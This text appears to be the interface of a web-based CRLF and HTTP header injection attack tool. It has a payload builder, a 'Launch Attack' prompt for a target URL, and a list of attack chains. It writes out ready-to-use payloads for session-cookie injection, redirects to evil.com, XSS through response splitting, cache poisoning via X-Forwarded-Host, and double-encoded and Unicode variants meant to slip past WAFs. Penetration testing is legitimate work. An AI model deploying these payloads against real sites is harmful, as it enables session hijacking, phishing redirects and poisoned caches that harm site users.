CRLF & Header Injection Lab
Advanced HTTP response splitting, header injection, cache poisoning, and open redirect detection suite.
Restricted · Authenticated Session
Target Configuration
URL Parameter
URL Path
Custom Header
Cookie Value
Referer Header
Preparing payloads…
0%
Payload Builder
Injected Header Name
Injected Header Value
Encoding
Generated Payload
%0d%0aSet-Cookie: session=hacked; Path=/; HttpOnly
Quick Payloads
Cookie Injection
%0d%0aSet-Cookie: injected=1
Open Redirect
%0d%0aLocation: https://evil.com
XSS via Header
%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert(1)</script>
Cache Poisoning
%0d%0aX-Forwarded-Host: evil.com
Double Encoded
%250d%250aSet-Cookie: evil=1
Unicode Variant
%E5%98%8D%E5%98%8ASet-Cookie: x=1
CRLF + XSS Chain
%0d%0aContent-Length: 0%0d%0a%0d%0a<svg onload=ale\x72t(1)>
Host Header Inject
%0d%0aHost: evil.com%0d%0aX-Forwarded-Host: evil.com
Attack Results
No attack results yet
Configure a target URL with {INJECT} placeholder,
select attack mode, and click Launch Attack.
select attack mode, and click Launch Attack.
Attack Chains Covered
1
CRLF → Cookie Injection
Inject Set-Cookie header to hijack sessions or bypass CSRF protections.
2
CRLF → XSS
Inject Content-Type + body to deliver reflected XSS via response splitting.
3
CRLF → Open Redirect
Inject Location header to redirect victims to attacker-controlled domains.
4
Cache Poisoning via Headers
Poison X-Forwarded-Host / X-Host to serve malicious cached responses.
5
Unicode / Double Encoded Bypass
Bypass WAF/filters using %E5%98%8D%E5%98%8A and %250d%250a variants.
6
HTTP/2 Pseudo-Header Injection
Exploit H2→H1 downgrade paths to smuggle injected headers into backend.